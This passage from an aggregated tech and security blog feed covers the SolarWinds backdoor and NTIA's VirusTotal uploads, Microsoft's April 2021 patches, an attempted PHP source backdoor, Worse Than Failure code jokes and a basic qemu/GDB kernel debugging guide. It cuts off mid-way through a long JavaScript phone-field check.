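For readers who want to check a local file against published indicators like these, computing the digests is straightforward. A minimal Python sketch (mine, not from the article; the function name is hypothetical):

```python
import hashlib

def file_hashes(path):
    """Return the (MD5, SHA-256) hex digests of a file, read in chunks
    so that arbitrarily large samples don't need to fit in memory."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()
```

Compare the output against the published indicators before concluding you are looking at the same file.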

“In August 2020, a U.S.-based entity uploaded a new backdoor that we have named SUNSHUTTLE to a public malware repository,” FireEye wrote.

The “Sunshuttle” or “GoldMax” backdoor, as identified by FireEye and Microsoft, respectively. Image:

A search in VirusTotal’s malware repository shows that on Aug. 13, 2020 someone uploaded a file with that same name and file hashes. It’s often not hard to look through VirusTotal and find files submitted by specific users over time, and several of those submitted by the same user over nearly two years include messages and files sent to email addresses for people currently working in NTIA’s information technology department.

An apparently internal email that got uploaded to VirusTotal in Feb. 2020 by the same account that uploaded the Sunshuttle backdoor malware to VirusTotal in August 2020.

The NTIA did not respond to requests for comment. But in December 2020, The Wall Street Journal reported the NTIA was among multiple federal agencies that had email and files plundered by the SolarWinds attackers. “The hackers broke into about three dozen email accounts since June at the NTIA, including accounts belonging to the agency’s senior leadership, according to a U.S. official familiar with the matter,” The Journal wrote.

It’s unclear what, if anything, NTIA’s IT staff did in response to scanning the backdoor file back in Aug. 2020. But the world would not find out about the SolarWinds debacle until early December 2020, when FireEye first disclosed the extent of its own compromise from the SolarWinds malware and published details about the tools and techniques used by the perpetrators.

The SolarWinds attack involved malicious code being surreptitiously inserted into updates shipped by SolarWinds for some 18,000 users of its Orion network management software. Beginning in March 2020, the attackers then used the access afforded by the compromised SolarWinds software to push additional backdoors and tools to targets when they wanted deeper access to email and network communications.

U.S. intelligence agencies have attributed the SolarWinds hack to an arm of the Russian state intelligence known as the SVR, which also was determined to have been involved in the hacking of the Democratic National Committee six years ago. On Thursday, the White House issued long-expected sanctions against Russia in response to the SolarWinds attack and other malicious cyber activity, leveling economic sanctions against 32 entities and individuals for disinformation efforts and for carrying out the Russian government’s interference in the 2020 presidential election.

The U.S. Treasury Department (which also was hit with second-stage malware that let the SolarWinds attackers read Treasury email communications) has posted a full list of those targeted, including six Russian companies for providing support to the cyber activities of the Russian intelligence service.

Also on Thursday, the FBI, National Security Agency (NSA), and the Cybersecurity Infrastructure Security Administration (CISA) issued a joint advisory on several vulnerabilities in widely-used software products that the same Russian intelligence units have been attacking to further their exploits in the SolarWinds hack. Among those is CVE-2020-4006, a security hole in VMWare Workspace One Access that VMware patched in December 2020 after hearing about it from the NSA.

On December 18, VMWare saw its stock price dip 5.5 percent after KrebsOnSecurity published a report linking the flaw to NSA reports about the Russian cyberspies behind the SolarWinds attack. At the time, VMWare was saying it had received “no notification or indication that CVE-2020-4006 was used in conjunction with the SolarWinds supply chain compromise.” As a result, a number of readers responded that making this connection was tenuous, circumstantial and speculative.

But the joint advisory makes clear the VMWare flaw was in fact used by SolarWinds attackers to further their exploits.

“Recent Russian SVR activities include compromising SolarWinds Orion software updates, targeting COVID-19 research facilities through deploying WellMess malware, and leveraging a VMware vulnerability that was a zero-day at the time for follow-on Security Assertion Markup Language (SAML) authentication abuse,” the NSA’s advisory (PDF) reads. “SVR cyber actors also used authentication abuse tactics following SolarWinds-based breaches.”

Officials within the Biden administration have told media outlets that a portion of the United States’ response to the SolarWinds hack would not be discussed publicly. But some security experts are concerned that Russian intelligence officials may still have access to networks that ran the backdoored SolarWinds software, and that the Russians could use that access to affect a destructive or disruptive network response of their own, The New York Times reports.

“Inside American intelligence agencies, there have been warnings that the SolarWinds attack — which enabled the SVR to place ‘back doors’ in the computer networks — could give Russia a pathway for malicious activity against government agencies and corporations,” The Times observed.

Worse Than FailureError'd: Days of Future Passed

After reading through so many of your submissions these last few weeks, I'm beginning to notice certain patterns emerging. One of these patterns is that despite the fact that dates are literally as old as time, people seem pathologically prone to bungling them. Surely our readers are already familiar with the notable "Falsehoods Programmers Believe" series of blog posts, but if you happen somehow to have been living under an Internet rock (or a cabbage leaf) for the last few decades, you might start your time travails at Infinite Undo. The examples here are not the most egregious ever (there are better coming later or sooner) but they are today's:

Famished Dug S. peckishly pronounces "It's about time!"


Far luckier Zachary Palmer appears to have found the perfect solution to poor Dug's delayed dinner: "It took the shipping company a little bit to start moving my package, but they made up for it by shipping it faster than the speed of light," says he.


Patient Philip awaits his {ship,prince,processor}: " B&H hitting us with hard truth on when the new line of AMD CPUs will really be available."


While an apparent contemporary of the latest royal, Eric R. creakily complains " This website for tracking my continuing education hours should be smart enough not to let me enter a date in the year 21 AD"


But as for His Lateness Himself, royal servant Steve A. has uncovered a scoop fit for Q:


[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Cryptogram NSA Discloses Vulnerabilities in Microsoft Exchange

Amongst the 100+ vulnerabilities patched in this month’s Patch Tuesday, there are four in Microsoft Exchange that were disclosed by the NSA.


Worse Than FailureCodeSOD: Constantly Counting

Steven was working on a temp contract for a government contractor, developing extensions to an ERP system. That ERP system was developed by whatever warm bodies happened to be handy, which meant the last "tech lead" was a junior developer who had no supervision, and before that it was a temp who was only budgeted to spend 2 hours a week on that project.

This meant that it was a great deal of spaghetti code, mashed together with a lot of special-case logic, and attempts to have some sort of organization even if that organization made no sense. Which is why, for example, all of the global constants for the application were required to be in a class Constants.

Of course, when you put a big pile of otherwise unrelated things in one place, you get some surprising results. Like this:

foreach (PurchaseOrder po in poList)
{
    if (String.IsNullOrEmpty(po.PoNumber))
    {
        Constants.NEW_COUNT++;
        CreatePoInOtherSystem(po);
    }
}

Yes, every time this system passes a purchase order off to another system for processing, the "constant" NEW_COUNT gets incremented. And no, this wasn't the only variable "constant", because before long, the Constants class became the "pile of static variables" class.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Cryptogram DNI’s Annual Threat Assessment

The office of the Director of National Intelligence released its “Annual Threat Assessment of the U.S. Intelligence Community.” Cybersecurity is covered on pages 20-21. Nothing surprising:

  • Cyber threats from nation states and their surrogates will remain acute.
  • States’ increasing use of cyber operations as a tool of national power, including increasing use by militaries around the world, raises the prospect of more destructive and disruptive cyber activity.
  • Authoritarian and illiberal regimes around the world will increasingly exploit digital tools to surveil their citizens, control free expression, and censor and manipulate information to maintain control over their populations.
  • During the last decade, state sponsored hackers have compromised software and IT service supply chains, helping them conduct operations — espionage, sabotage, and potentially prepositioning for warfighting.

The supply chain line is new; I hope the government is paying attention.


Cryptogram The FBI Is Now Securing Networks Without Their Owners’ Permission

In January, we learned about a Chinese espionage campaign that exploited four zero-days in Microsoft Exchange. One of the characteristics of the campaign, in the later days when the Chinese probably realized that the vulnerabilities would soon be fixed, was to install a web shell in compromised networks that would give them subsequent remote access. Even if the vulnerabilities were patched, the shell would remain until the network operators removed it.

Now, months later, many of those shells are still in place. And they’re being used by criminal hackers as well.

On Tuesday, the FBI announced that it successfully received a court order to remove “hundreds” of these web shells from networks in the US.

This is nothing short of extraordinary, and I can think of no real-world parallel. It’s kind of like if a criminal organization infiltrated a door-lock company and surreptitiously added a master passkey feature, and then customers bought and installed those locks. And then if the FBI got a court order to fix all the locks to remove the master passkey capability. And it’s kind of not like that. In any case, it’s not what we normally think of when we think of a warrant. The links above have details, but I would like a legal scholar to weigh in on the implications of this.

MEBasics of Linux Kernel Debugging

Firstly a disclaimer, I’m not an expert on this and I’m not trying to instruct anyone who is aiming to become an expert. The aim of this blog post is to help someone who has a single kernel issue they want to debug as part of doing something that’s mostly not kernel coding. I welcome comments about the second step to kernel debugging for the benefit of people who need more than this (which might include me next week). Also suggestions for people who can’t use a kvm/qemu debugger would be good.

Below is a command to run qemu with GDB. It should be run from the Linux kernel source directory. You can add other qemu options for a block device and virtual networking if necessary, but the bug I encountered gave an oops from the initrd so I didn’t need to go further. The “nokaslr” is to avoid address space randomisation which deliberately makes debugging tasks harder (from a certain perspective debugging a kernel and compromising a kernel are fairly similar). Loading the bzImage is fine, gdb can map that to the different file it looks at later on.

qemu-system-x86_64 -kernel arch/x86/boot/bzImage -initrd ../initrd-$KERN_VER -curses -m 2000 -append "root=/dev/vda ro nokaslr" -gdb tcp::1200

The command to run GDB is “gdb vmlinux”; when at the GDB prompt you can run the command “target remote localhost:1200” to connect to the GDB server on port 1200. Note that there is nothing special about port 1200, it was given in an example I saw and is as good as any other port. It is important that you run GDB against the “vmlinux” file in the main directory, not any of the several stripped and packaged files; GDB can’t handle a bzImage file, but that’s OK, it ends up much the same in RAM.

When the “target remote” command is processed the kernel will be suspended by the debugger, if you are looking for a bug early in the boot you may need to be quick about this. Using “qemu-system-x86_64” instead of “kvm” slows things down and can help in that regard. The bug I was hunting happened 1.6 seconds after kernel load with KVM and 7.8 seconds after kernel load with qemu. I am not aware of all the implications of the kvm vs qemu decision on debugging. If your bug is a race condition then trying both would be a good strategy.

After the “target remote” command you can debug the kernel just like any other program.

If you put a breakpoint on print_modules() that will catch the operation of printing an Oops which can be handy.
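Putting those pieces together, an illustrative session (using the same port 1200 as above, with qemu already running) looks something like this:

```
$ gdb vmlinux
(gdb) target remote localhost:1200
(gdb) break print_modules
(gdb) continue
```

When the breakpoint hits you can inspect the backtrace and variables as with any userspace program.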

Worse Than FailureCodeSOD: The Truth and the Truth

When Andy inherited some C# code from a contracting firm, he gave it a quick skim. He saw a bunch of methods with names like IsAvailable or CanPerform…, but he also saw that it was essentially random as to whether or not these methods returned bool or string.

That didn't seem like a good thing, so he started to take a deeper look, and that's when he found this.

public ActionResult EditGroup(Group group)
{
    string fleetSuccess = string.Empty;
    bool success = false;
    if (action != null)
    {
        fleetSuccess = updateGroup(group);
    }
    else
    {
        fleetSuccess = Boolean.TrueString;
    }
    success = updateExternalGroup(group);
    fleetSuccess += "&&&" + success;
    if (fleetSuccess.ToLower().Equals("true&&&true"))
    {
        GetActivityDataFromService(group, false);
    }
    return Json(fleetSuccess, JsonRequestBehavior.AllowGet);
}

So, updateGroup returns a string containing a boolean (at least, we hope it contains a boolean). updateExternalGroup returns an actual boolean. If both of these things are true, then we want to invoke GetActivityDataFromService.

Clearly, the only way to do this comparison is to force everything into being a string, with a &&& jammed in the middle as a spacer. Uh, for readability, I guess? Maybe? I almost suspect someone thought they were inventing their own "and" operator and didn't want it to conflict with & or &&.

Or maybe, maybe their code was read aloud by Jeff Goldblum. "True, and-and-and true!" It's very clear they didn't think about whether or not they should do this.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!


Cryptogram More Biden Cybersecurity Nominations


President Biden announced key cybersecurity leadership nominations Monday, proposing Jen Easterly as the next head of the Cybersecurity and Infrastructure Security Agency and John “Chris” Inglis as the first ever national cyber director (NCD).

I know them both, and think they’re both good choices.

More news.

Cryptogram Backdoor Added — But Found — in PHP

Unknown hackers attempted to add a backdoor to the PHP source code. It was two malicious commits, with the subject “fix typo” and the names of known PHP developers and maintainers. They were discovered and removed before being pushed out to any users. But since 79% of the Internet’s websites use PHP, it’s scary.

Developers have moved PHP to GitHub, which has better authentication. Hopefully it will be enough — PHP is a juicy target.

Krebs on SecurityMicrosoft Patch Tuesday, April 2021 Edition

Microsoft today released updates to plug at least 110 security holes in its Windows operating systems and other products. The patches include four security fixes for Microsoft Exchange Server — the same systems that have been besieged by attacks on four separate (and zero-day) bugs in the email software over the past month. Redmond also patched a Windows flaw that is actively being exploited in the wild.

Nineteen of the vulnerabilities fixed this month earned Microsoft’s most-dire “Critical” label, meaning they could be used by malware or malcontents to seize remote control over vulnerable Windows systems without any help from users.

Microsoft released updates to fix four more flaws in Exchange Server versions 2013-2019 (CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, CVE-2021-28483). Interestingly, all four were reported by the U.S. National Security Agency, although Microsoft says it also found two of the bugs internally. A Microsoft blog post published along with today’s patches urges Exchange Server users to make patching their systems a top priority.

Satnam Narang, staff research engineer at Tenable, said these vulnerabilities have been rated ‘Exploitation More Likely’ using Microsoft’s Exploitability Index.

“Two of the four vulnerabilities (CVE-2021-28480, CVE-2021-28481) are pre-authentication, meaning an attacker does not need to authenticate to the vulnerable Exchange server to exploit the flaw,” Narang said. “With the intense interest in Exchange Server since last month, it is crucial that organizations apply these Exchange Server patches immediately.”

Also patched today was a vulnerability in Windows (CVE-2021-28310) that’s being exploited in active attacks already. The flaw allows an attacker to elevate their privileges on a target system.

“This does mean that they will either need to log on to a system or trick a legitimate user into running the code on their behalf,” said Dustin Childs of Trend Micro. “Considering who is listed as discovering this bug, it is probably being used in malware. Bugs of this nature are typically combined with other bugs, such as a browser bug or PDF exploit, to take over a system.”

In a technical writeup on what they’ve observed since finding and reporting attacks on CVE-2021-28310, researchers at Kaspersky Lab noted the exploit they saw was likely used together with other browser exploits to escape “sandbox” protections of the browser.

“Unfortunately, we weren’t able to capture a full chain, so we don’t know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities,” Kaspersky’s researchers wrote.

Allan Liska, senior security architect at Recorded Future, notes that there are several remote code execution vulnerabilities in Microsoft Office products released this month as well. CVE-2021-28454 and CVE-2021-28451 involve Excel, while CVE-2021-28453 is in Microsoft Word and CVE-2021-28449 is in Microsoft Office. All four vulnerabilities are labeled by Microsoft as “Important” (not quite as bad as “Critical”). These vulnerabilities impact all versions of their respective products, including Office 365.

Other Microsoft products that got security updates this month include Edge (Chromium-based), Azure and Azure DevOps Server, SharePoint Server, Hyper-V, Team Foundation Server, and Visual Studio.

Separately, Adobe has released security updates for Photoshop, Digital Editions, RoboHelp, and Bridge.

It’s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it’s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.

But before you update, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

LongNowTouching the Future

Aboriginal fish traps.

In search of a new story for the future of artificial intelligence, Long Now speaker Genevieve Bell looks back to its cybernetic origins — and keeps on looking, thousands of years into the past.

From her new essay in Griffith Review:

In this moment, we need to be reminded that stories of the future – about AI, or any kind – are never just about technology; they are about people and they are about the places those people find themselves, the places they might call home and the systems that bind them all together.

Genevieve Bell, “Touching the Future” in Griffith Review.

Cryptogram Cybersecurity Experts to Follow on Twitter

Security Boulevard recently listed the “Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021.” I came in at #7. I thought that was pretty good, especially since I never tweet. My Twitter feed just mirrors my blog. (If you are one of the 134K people who read me from Twitter, “hi.”)

Worse Than FailureCodeSOD: A Form of Reuse

Writing code that is reusable is an important part of software development. In a way, we're not simply solving the problem at hand, but we're building tools we can use to solve similar problems in the future. Now, that's also a risk: premature abstraction is its own source of WTFs.

Daniel's peer wrote some JavaScript which is used for manipulating form inputs on customer contact forms. You know the sorts of forms: give us your full name, phone number, company name, email, and someone from our team will be in touch. This developer wrote the script, and offered it to clients to enhance their forms. Well, there was one problem: this script would get embedded in customer contact forms, but not all customer contact forms use the same conventions for how they name their fields.

There's an easy solution for that, involving parameterizing the code or adding a configuration step. There's a hard solution, where you build a heuristic that works for most forms. Then there's this solution, which… well…. Let me present the logic for handling just one field type, neither redacted nor elided.

for(llelementlooper=0; llelementlooper<document.forms[llformlooper2].elements.length; llelementlooper++) { var llelementphone = (document.forms[llformlooper2].elements[llelementlooper].name) if ( llformphone == '' && ((llelementphone=='phone') || (llelementphone=='Phone') || (llelementphone=='phone') || (llelementphone=='mobilephone') || (llelementphone=='PHONE') || (llelementphone=='sPhone') || (llelementphone=='strPhone') || (llelementphone=='Telephone') || (llelementphone=='telephone') || (llelementphone=='tel') || (llelementphone=='si_contact_ex_field6') || (llelementphone=='phonenumber') || (llelementphone=='phone_number') || (llelementphone=='phoneTextBox') || (llelementphone=='PhoneNumber_num_25_1') || (llelementphone=='Telefone') || (llelementphone=='Contact Phone') || (llelementphone=='submitted[row_3][phone]') || (llelementphone=='edit-profile-phone') || (llelementphone=='contactTelephone') || (llelementphone=='f4') || (llelementphone=='Contact-Phone') || (llelementphone=='formItem_239') || (llelementphone=='phone_r') || (llelementphone=='PhoneNo') || (llelementphone=='LeadGen_ContactForm_98494_m0:Phone') || (llelementphone=='telefono') || (llelementphone=='ntelephone') || (llelementphone=='wtelephone') || (llelementphone=='watelephone') || (llelementphone=='form[telefoon]') || (llelementphone=='phone_work') || (llelementphone=='telephone-number') || (llelementphone=='ctl00$HeaderText$ctl00$PhoneText') || (llelementphone=='ctl00$ctl00$cphMain$cphInsideMain$widget1$ctl00$viewBiz$ctl00$phone$textbox') || (llelementphone=='ctl00$ctl00$ContentPlaceHolderBase$ContentPlaceHolderSideMenu$TextBoxPhone') || (llelementphone=='ctl00$SPWebPartManager1$g_c8bd31c3_e338_41df_bdbe_021242ca01c8$ctl01$ctl06$txtTextbox') || (llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$MasterContentPlaceHolder$txtPhone') || (llelementphone=='curftelephone') || (llelementphone=='form[Telephone]') || (llelementphone=='tx_pilmailform_pi1[text][phone]') || 
(llelementphone=='ctl00$ctl00$templateMainContent$homeBanners$HomeBannerList$ctrLeads$txt_5_1') || (llelementphone=='ac_daytimeNumber') || (llelementphone=='daytime_phone') || (llelementphone=='r4') || (llelementphone=='ctl00$ContentPlaceHolderBody$Phone') || (llelementphone=='Fld10_label') || (llelementphone=='field333') || (llelementphone=='txtMobile') || (llelementphone=='form_nominator_phonenumber') || (llelementphone=='submitted[phone_no]') || (llelementphone=='submitted[phone]') || (llelementphone=='submitted[5]') || (llelementphone=='submitted[telephone_no]') || (llelementphone=='fields[Contact Phone]') || (llelementphone=='cf2_field_5') || (llelementphone=='a23786') || (llelementphone=='rpr_phone') || (llelementphone=='phone-number') || (llelementphone=='txt_homePhone') || (llelementphone=='your-number') || (llelementphone=='Contact_Phone') || (llelementphone=='ctl00$CPH_body$txtContactnumber') || (llelementphone=='profile_telephone') || (llelementphone=='item_meta[90]' && llfrmid==11823) || (llelementphone=='item_meta[181]' && llfrmid==26416) || (llelementphone=='input_4' && llfrmid==21452) || (llelementphone=='EditableTextField100' && llfrmid==13948) || (llelementphone=='EditableTextField205' && llfrmid==13948) || (llelementphone=='EditableTextField100' && llfrmid==13948) || (llelementphone=='EditableTextField166' && llfrmid==13948) || (llelementphone=='EditableTextField104' && llfrmid==13948) || (llelementphone=='cf2_field_4' && llfrmid==23878) || (llelementphone=='input_4' && llfrmid==24017) || (llelementphone=='cf_field_4' && llfrmid==15876) || (llelementphone=='cf5_field_5' && llfrmid==15876) || (llelementphone=='input_9' && llfrmid==17254) || (llelementphone=='input_2' && llfrmid==22954) || (llelementphone=='input_8' && llfrmid==23756) || (llelementphone=='input_3' && llfrmid==18793) || (llelementphone=='input_6' && llfrmid==24811) || (llelementphone=='input_3' && llfrmid==19880) || (llelementphone=='input_6' && llfrmid==19230) || 
(llelementphone=='input_3' && llfrmid==24747) || (llelementphone=='input_4' && llfrmid==25897) || (llelementphone=='text-481' && llfrmid==14451) || (llelementphone=='Form7111$formField_7576') || (llelementphone=='Form7168$formField_7673') || (llelementphone=='Form7116$formField_7592') || (llelementphone=='Form7150$formField_7645') || (llelementphone=='Form7153$formField_7655') || (llelementphone=='Form7119$formField_7600') || (llelementphone=='Form7123$formField_7608') || (llelementphone=='Form7161$formField_7665') || (llelementphone=='Form7176$formField_7690') || (llelementphone=='Form7172$formField_7681') || (llelementphone=='Form7113$formField_7584') || (llelementphone=='Form7106$formField_7568') || (llelementphone=='Form7111$formField_7576') || (llelementphone=='Form7136$formField_7628') || (llelementphone=='Form6482$formField_7621') || (llelementphone=='Form6548$formField_6988') || (llelementphone=='submitted[business_phone]') || (llelementphone=='tfa_3' && llfrmid==23388) || (llelementphone=='ContentObjectAttribute_ezsurvey_answer_4455_3633') || (llelementphone=='838ae21c-1f95-488f-a511-135a588a50fb_Phone') || (llelementphone=='plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneRightContent$contentText$BizFormControl1$Bizform1$ctl00$Telephone$txt1st') || (llelementphone=='plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneRightContent$contentText$BizFormControl1$Bizform1$ctl00$Telephone') || (llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$ContentAreaPlaceholderMain$ctl02$ContactForm_3$TextBoxTelephone') || (llelementphone=='plc$lt$Content2$pageplaceholder1$pageplaceholder1$lt$Content$BizForm$viewBiz$ctl00$Phone_Number') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder1$cphMainContent$C002$tbTelephone') || (llelementphone=='contact$tbPhoneNumber') || (llelementphone=='crMain$ctl00$txtPhone') || (llelementphone=='ctl00$PrimaryContent$tbPhone') || (llelementphone=='ff_nm_phone[]') || (llelementphone=='q5_phoneNumber5[phone]') || 
(llelementphone=='TechContactPhone') || (llelementphone=='referral_phone_number') || (llelementphone=='field8418998') || (llelementphone=='ctl00$Content$ctl00$txtPhone') || (llelementphone=='ctl00$PlaceHolderMain$ucContactUs$txtPhone') || (llelementphone=='m_field_id_4' && llfrmid==15091) || (llelementphone=='Field7' && llfrmid==23387) || (llelementphone=='input_4' && llfrmid==22578) || (llelementphone=='input_2' && llfrmid==11241) || (llelementphone=='input_7' && llfrmid==23633) || (llelementphone=='input_7' && llfrmid==22114) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('demo') != -1) && llfrmid==17544) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('contact') != -1) && llfrmid==17544) || (llelementphone=='field_4' && llfrmid==24654) || (llelementphone=='input_6' && llfrmid==24782) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('contact-us') != -1) && llfrmid==16794) || (llelementphone=='input_3' && (llformalyzerURL.indexOf('try-and-buy') != -1) && llfrmid==16794) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('contact-us') != -1) && llfrmid==23842) || (llelementphone=='input_4' && llfrmid==25451) || (llelementphone=='input_5' && llfrmid==24911) || (llelementphone=='input_3' && llfrmid==13417) || (llelementphone=='input_4' && llfrmid==23813) || (llelementphone=='input_4' && llfrmid==21483) || (llelementphone=='input_3' && llfrmid==25396) || (llelementphone=='input_3' && llfrmid==16175) || (llelementphone=='input_7' && llfrmid==25797) || (llelementphone=='input_4' && llfrmid==15650) || (llelementphone=='input_3' && llfrmid==22025) || (llelementphone=='input_3' && llfrmid==14534) || (llelementphone=='input_4' && llfrmid==25216) || (llelementphone=='input_5' && llfrmid==22884) || (llelementphone=='input_6' && llfrmid==25783) || (llelementphone=='text-747' && llfrmid==16324) || (llelementphone=='vfb-42' && llfrmid==24468) || (llelementphone=='vfb-33' && llfrmid==24468) || (llelementphone=='item_meta[57]' && 
llfrmid==25268) || (llelementphone=='item_meta[78]' && llfrmid==25268) || (llelementphone=='item_meta[85]' && llfrmid==25268) || (llelementphone=='item_meta[154]' && llfrmid==25268) || (llelementphone=='item_meta[220]' && llfrmid==25268) || (llelementphone=='item_meta[240]' && llfrmid==25268) || (llelementphone=='item_meta[286]' && llfrmid==25268) || (llelementphone=='fieldname5' && llfrmid==12535) || (llelementphone=='Question12' && llfrmid==24639) || (llelementphone=='ninja_forms_field_4' && llfrmid==19321) || (llelementphone=='EditableTextField' && llfrmid==15064) || (llelementphone=='form_fields[27]' && llfrmid==22688) || (llelementphone=='ctl00$body$phone') || (llelementphone=='ctl00$MainContent$txtPhone') || (llelementphone=='FreeTrialForm$Phone') || (llelementphone=='text-521ada035aa46') || (llelementphone=='C_BusPhone') || (llelementphone=='ctl00$ctl00$templateMainContent$pageContent$ctrLeads$txt_5_1') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl06$1204') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl06$1320') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl07$1242') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl07$1202') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl08$1242') || (llelementphone=='ctl00$MainColumnPlaceHolder$uxPhone') || (llelementphone=='ctl00$MainContent$DropZoneTop$columnDisplay$ctl04$controlcolumn$ctl00$WidgetHost$WidgetHost_widget$IDPhone') || (llelementphone=='ctl00$ctl05$txtPhone') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl07$1219') || (llelementphone=='LeadGen_ContactForm_33872_m419365:Phone') || (llelementphone=='F02220803') || (llelementphone=='h2c0f') || (llelementphone=='your_phone_number') || (llelementphone=='Question7') || (llelementphone=='Question51') || (llelementphone=='Question59') || (llelementphone=='Question35') || (llelementphone=='Question67') || (llelementphone=='field9740823') || (llelementphone=='message[phone]') || 
(llelementphone=='dnn$ctr1266$ViewKamakuraRegister$Phone') || (llelementphone=='phone1') || (llelementphone=='inf_field_Phone1') || (llelementphone=='hscontact_phone') || (llelementphone=='data[Contact][phone]') || (llelementphone=='fields[Phone]') || (llelementphone=='contact[PhoneNumber]') || (llelementphone=='phonename3') || (llelementphone=='UserPhone') || (llelementphone=='ctl00$MainBody$txtPhoneTech') || (llelementphone=='Telephone1') || (llelementphone=='PhoneNumber') || (llelementphone=='work_phone') || (llelementphone=='jform[contact_telephone]') || (llelementphone=='form[phone]') || (llelementphone=='RequestAQuote1$txtPhone') || (llelementphone=='06_Phone') || (llelementphone=='txtPhone') || (llelementphone=='field_location[und][0][phone]') || (llelementphone=='your-phone') || (llelementphone=='cmsForms_phone') || (llelementphone=='Txt_phonenumber') || (llelementphone=='businessPhone') || (llelementphone=='boxHomePhone') || (llelementphone=='HomePhone') || (llelementphone=='request-phone') || (llelementphone=='user[phone]') || (llelementphone=='DATA[PHONE]') || (llelementphone=='ctl00$ctl00$ctl00$cphContent$cphContent$cphContent$Phone') || (llelementphone=='ctl00$MainBody$Form1$obj11') || (llelementphone=='LeadGen_ContactForm_90888_m1467651:Phone') || (llelementphone=='Users[work]') || (llelementphone=='Question43') || (llelementphone=='aics_phone') || (llelementphone=='form[workphone]') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder1$cphMainContent$C006$tbTelephone') || (llelementphone=='cntnt01fbrp__47') || (llelementphone=='submitted[phone_number]') || (llelementphone=='flipform_phone') || (llelementphone=='txtPhone') || (llelementphone=='ctl00$ContentPlaceHolder2$txtPhnno') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$mainContentRegion$BizFormControl1$Bizform1$ctl00$Phone') || (llelementphone=='inpPhone') || (llelementphone=='j_phone') || (llelementphone=='m6e81afbrp__53') || (llelementphone=='item_meta[119]') || 
(llelementphone=='ctl00$ContentPlaceHolder_Content$dataPhone') || (llelementphone=='ctl00$generalContentPlaceHolder$ctrlContactUs$tbPhone') || (llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$ContentPlaceHolder1$Contact_6$txtPhone') || (llelementphone=='ctl00$MainContent$tel') || (llelementphone=='dynform_element_3') || (llelementphone=='telephone_1') || (llelementphone=='cf_phone') || (llelementphone=='Lead_PrimaryPhone') || (llelementphone=='p_lt_zoneContent_wP_wP_lt_zonePageWidgets_RevolabsMicrosoftDynamicsCRMContactForm_1_txtBusinessPhone') || (llelementphone=='si_contact_ex_field2') || (llelementphone=='dnn$ctr458$XModPro$ctl00$ctl00$ctl00$Telephone') || (llelementphone=='ctl00$ctl06$txtTelephone') || (llelementphone=='dnn$ctr458$XModPro$ctl00$ctl00$ctl00$Telephone') || (llelementphone=='ctl00$ctl00$mainCopy$CPHCenter$ctl00$QuickRegControl_2$TBPhone') || (llelementphone=='LeadGen_ContactForm_38163_m457931:Phone') || (llelementphone=='LeadGen_ContactForm_29909_m371524:Phone') || (llelementphone=='LeadGen_ContactForm_32343_m395611:Phone') || (llelementphone=='LeadGen_ContactForm_31530_m388101:Phone') || (llelementphone=='LeadGen_ContactForm_27072_m349818:Phone') || (llelementphone=='LeadGen_ContactForm_28362_m354522:Phone') || (llelementphone=='LeadGen_ContactForm_28759_m358745:Phone') || (llelementphone=='LeadGen_ContactForm_32343_m395611:Phone') || (llelementphone=='LeadGen_ContactForm_33631_m415978:Phone') || (llelementphone=='LeadGen_ContactForm_30695_m380436:Phone') || (llelementphone=='LeadGen_ContactForm_29958_m372138:Phone') || (llelementphone=='LeadGen_ContactForm_31471_m387422:Phone') || (llelementphone=='LeadGen_ContactForm_32514_m397613:Phone') || (llelementphone=='LeadGen_ContactForm_29152_m362772:Phone') || (llelementphone=='LeadGen_ContactForm_32540_m397908:Phone') || (llelementphone=='pNumber') || (llelementphone=='organizer_phone') || (llelementphone=='ctl00$PlaceHolderMain$TrialDownloadForm$Phone') || 
